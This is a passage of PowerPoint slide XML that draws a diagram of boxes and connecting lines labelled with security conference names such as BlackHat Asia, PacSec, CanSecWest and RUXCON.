              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35903" name="Rectangle 437"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4147" y="3487"/>
                <a:ext cx="214" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>FIRST</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35904" name="Rectangle 438"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3856" y="3332"/>
                <a:ext cx="545" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35905" name="Rectangle 439"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3856" y="3332"/>
                <a:ext cx="545" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35906" name="Line 440"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4129" y="2918"/>
                <a:ext cx="254" cy="414"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35907" name="Rectangle 441"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3949" y="3338"/>
                <a:ext cx="428" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>BlackHat Asia</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35908" name="Rectangle 442"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5171" y="2221"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35909" name="Rectangle 443"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5171" y="2221"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35910" name="Line 444"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4963" y="2304"/>
                <a:ext cx="379" cy="38"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35911" name="Rectangle 445"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5243" y="2228"/>
                <a:ext cx="251" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>PacSec</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35912" name="Rectangle 446"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2091" y="1824"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35913" name="Rectangle 447"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2091" y="1824"/>
                <a:ext cx="343" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35914" name="Line 448"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="2262" y="1907"/>
                <a:ext cx="471" cy="68"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35915" name="Rectangle 449"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2175" y="1828"/>
                <a:ext cx="224" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>EUSec</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35916" name="Rectangle 450"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="69" y="2526"/>
                <a:ext cx="347" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35917" name="Rectangle 451"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="69" y="2526"/>
                <a:ext cx="347" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35918" name="Line 452"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="242" y="2362"/>
                <a:ext cx="600" cy="164"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35919" name="Rectangle 453"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="155" y="2532"/>
                <a:ext cx="187" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Layer</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35920" name="Rectangle 454"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="299" y="2532"/>
                <a:ext cx="64" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35921" name="Rectangle 455"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2293" y="2979"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35922" name="Rectangle 456"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2293" y="2979"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35923" name="Line 457"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2565" y="2462"/>
                <a:ext cx="638" cy="517"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35924" name="Rectangle 458"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2367" y="2986"/>
                <a:ext cx="470" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Identity Summit</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35925" name="Rectangle 459"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920" y="3785"/>
                <a:ext cx="445" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35926" name="Rectangle 460"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4920" y="3785"/>
                <a:ext cx="445" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35927" name="Line 461"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5130" y="3511"/>
                <a:ext cx="13" cy="274"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35928" name="Rectangle 462"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5018" y="3791"/>
                <a:ext cx="299" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>RUXCON</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35929" name="Rectangle 463"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="73" y="2374"/>
                <a:ext cx="440" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35930" name="Rectangle 464"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="73" y="2374"/>
                <a:ext cx="440" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35931" name="Line 465"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="293" y="2032"/>
                <a:ext cx="485" cy="342"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35932" name="Rectangle 466"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="128" y="2378"/>
                <a:ext cx="406" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>CanSecWest</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35933" name="Rectangle 467"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4304" y="3785"/>
                <a:ext cx="546" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35934" name="Rectangle 468"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4304" y="3785"/>
                <a:ext cx="546" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35935" name="Line 469"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
